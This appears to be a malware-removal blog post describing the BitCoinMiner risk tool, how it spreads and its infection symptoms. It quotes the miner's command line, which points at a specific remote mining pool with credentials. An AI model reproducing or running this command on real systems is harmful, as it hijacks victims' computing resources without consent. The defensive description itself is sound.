RiskTool.Win32.BitCoinMiner is a risk tool or potentially unwanted application that may use your computer's resources to generate bitcoin blocks and send them to a remote location. What is bitcoin? Bitcoins are a virtual currency. Everyone who has a computer with the high-end graphics card and internet access can generate bitcoins and then sell the coins in exchange for a hard currency. The current US dollar-to-bitcoin rate at the time of writing is $5.62 per bitcoin according to mtgox.com. However, exchange rates may vary daily. An average value of one bitcoin was $29 back in June, 2011. Join any Bitcoin network you like, acquire a bitcoin wallet, install mining client and you are ready to go. It's free and legal.
Why then it's considered risk tool? Malware authors are infecting computer systems with powerful GPUs to make easy money. They are using your precious GPU and CPU resources to generate bitcoins without your consent. Let's say you have a graphic card worth $140. In the best case scenario, depending on the difficulty factor and other stuff, cyber crooks can generate bitcoins worth around $150 per month. Combined with thousands of other infected computers, cyber crooks can expect to earn some serious cash.
RiskTool.Win32.BitCoinMiner is distributed through drive-by download, social networks, instant messengers and removable drives. The bit coin mining module can be also downloaded by the NgrBot. This bot determines GeoIp details, downloads additional modules from the Internet and kills all previous bitcoin mining processes. It has spyware modules as well. Symptoms of RiskTool.Win32.BitCoinMiner infection:
High CPU usage. BitCoinMiner uses the computer's CPU resources very intensively by performing highly complex computations. It's a very time consuming process. It makes an infected computer run very slow, so malware authors decided to generate Bitcoins by leveraging the CPU cycles of infected machine. By the way, the NgrBot attempts to load nvcuda.dll if present to mine Bitcoins using GPU.
Suspicious network activity. There are more packets Sent than Received.
Active connections to specific servers. It mines for bitcoins at one minute intervals by executing the following command:
hehe.exe -a 60 -g yes -o http://hdzx.aquarium-stakany.com:8332/ -u darkSons_crypt -p blabblabla -t 2
RiskTool.Win32.BitCoinMiner is added to the list of startup programs. The risk tool also changes Windows regsitry, so that it runs every time Windows starts.
RiskTool.Win32.BitCoinMiner can infect USB pen drives and other removable media. Don't just USB pen drive when your computer is infected with this malware.
There's a great chance it came bundled with other malicious software. If you got infected with this risk tool, please scan your computer with anti-malware software. if you have any questions, please leave a comment. Good luck and be safe online!
Download recommended anti-malware software and run a full system scan. It will detect and remove this infection from your computer.
Tell your friends: